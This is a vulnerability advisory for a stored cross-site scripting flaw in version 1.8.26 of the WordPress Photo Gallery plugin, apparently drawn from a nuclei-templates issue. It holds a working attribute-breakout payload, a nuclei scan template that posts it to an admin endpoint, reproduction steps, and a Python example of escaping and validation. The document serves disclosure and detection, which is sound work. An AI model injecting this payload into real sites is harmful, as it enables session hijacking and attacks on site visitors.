WordPress Photo Gallery Plugin Stored XSS Vulnerability

Vulnerability Information

Vulnerability name: WordPress Photo Gallery Plugin Stored XSS Vulnerability

Vulnerability type: Cross-site scripting

Severity: High

Vulnerability description: The WordPress Photo Gallery plugin is a popular WordPress plugin for creating and managing photo galleries on a website. It is widely used on personal blogs, corporate sites and in many other settings, letting users easily upload, edit and display images, and it is favoured by many WordPress users for its ease of use and rich feature set. Version 1.8.26 of the plugin contains a stored cross-site scripting (XSS) vulnerability that an attacker can exploit by injecting a malicious script into the "Distance between pictures" field. When an administrator or another user views the affected page, the injected script executes in their browser. The root cause is that the plugin fails to adequately filter and escape user input, so the malicious script is stored and runs on subsequent page loads. The vulnerability can be used to steal users' session cookies, redirect users to malicious sites or perform other malicious actions in the user's browser, posing a serious threat to the site and its users. An attacker needs permission to edit themes to exploit this vulnerability, which means it mainly affects users with administrator privileges. However, once exploited, its impact extends to every user who visits the affected page.
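The root cause described above is a value echoed into an HTML attribute without attribute-context escaping. The following Python is an added illustration, not code from the advisory or from the Photo Gallery plugin: it models the unescaped rendering, shows that a browser-style parser then sees an injected event-handler attribute, and applies the two defensive fixes a plugin author would combine (validate the numeric setting on save; escape in attribute context on output). The field name, function names, the numeric cap and the sample values are constructed for this example; the payload string is the one quoted in the advisory.

```python
"""Added example (not the advisory's or the plugin's code): attribute-context
escaping versus raw concatenation, plus input validation for a numeric setting."""
import html
import re
from html.parser import HTMLParser

FIELD = "distance_between_pictures"  # hypothetical form field name for the setting

# Constructed sample inputs: a benign value and the attribute-breakout payload
# quoted in the advisory (it begins with a double quote to close value="...").
BENIGN = "10"
PAYLOAD = '"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3'


def render_vulnerable(value: str) -> str:
    """Models the root cause: the stored setting is concatenated into the
    attribute without escaping, so a '"' in it ends the value attribute and
    whatever follows is parsed as new attributes (here an event handler)."""
    return f'<input type="text" name="{FIELD}" value="{value}">'


def render_escaped(value: str) -> str:
    """Output fix: attribute-context escaping. html.escape(quote=True) turns
    both quote characters into entities, so the value cannot close the
    attribute whatever was stored (WordPress's esc_attr() plays this role in PHP)."""
    return f'<input type="text" name="{FIELD}" value="{html.escape(value, quote=True)}">'


def sanitize_distance(raw: str, default: int = 0, maximum: int = 1000) -> int:
    """Input fix: the setting is a pixel distance, so only a non-negative
    integer is accepted on save; anything else falls back to the default.
    The cap is an arbitrary constructed bound, not a plugin value."""
    if not re.fullmatch(r"\d+", raw.strip()):
        return default
    return min(int(raw), maximum)


class _FirstTag(HTMLParser):
    """Collects the attribute names of the first start tag, the way a browser
    would tokenize them, so we can see which attributes the markup gained."""

    def __init__(self) -> None:
        super().__init__()
        self.seen = False
        self.attr_names: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if not self.seen:
            self.seen = True
            self.attr_names = [name for name, _ in attrs]


def attribute_names(markup: str) -> list[str]:
    """Parse a single tag and return its attribute names in order."""
    parser = _FirstTag()
    parser.feed(markup)
    parser.close()
    return parser.attr_names


if __name__ == "__main__":
    # The vulnerable rendering gains onmouseover and style attributes;
    # the escaped rendering keeps exactly type, name and value.
    print("vulnerable:", attribute_names(render_vulnerable(PAYLOAD)))
    print("escaped:   ", attribute_names(render_escaped(PAYLOAD)))
    print("sanitized: ", sanitize_distance(PAYLOAD), sanitize_distance(BENIGN))
```

Validation on save is what stops the payload from being persisted at all, which is the property that makes this a stored rather than reflected issue; escaping on output is the defence that holds even for values written before the fix or through other code paths, so both belong in the patch.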

Vendor: 10web

Product: WordPress Photo Gallery Plugin

Affected version: 1.8.26

Source: https://github.com/projectdiscovery/nuclei-templates/issues/12712

Type: projectdiscovery/nuclei-templates:github issues

Source summary

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

```yaml
id: wordpress-photo-gallery-xss

info:
  name: WordPress Photo Gallery Plugin Stored XSS
  author: 0xr2r
  severity: high
  description: |
    Detects stored XSS vulnerability in WordPress Photo Gallery plugin version 1.8.26. The payload is injected in the "Distance between pictures" field and executes when the page is loaded.
  tags: wordpress,xss,stored,plugin
  reference:
    - https://10web.io/plugins/wordpress-photo-gallery/

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        distance_between_pictures="onmouseover=\"alert(1)\"style=\"position:absolute;width:100%;height:100%;top:0;left:0;\"qq9r3"

    # Note: the nonce extracted here is not referenced by either request as written.
    extractors:
      - type: regex
        name: csrf_token
        part: body
        regex:
          - '<input\s+type="hidden"\s+name="_wpnonce"\s+value="([a-zA-Z0-9]+)"' # Extract CSRF token
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "onmouseover=\"alert(1)\""
      - type: word
        part: header
        words:
          - "text/html"
```

Relevant dumped responses

#### Steps to Execute the Payload:

1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2
2. In the Distance between pictures field, place your payload: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed

Anything else?

No response


http://example.com/2025/07/25/github_866851028/
Author: lianccc
Published: July 25, 2025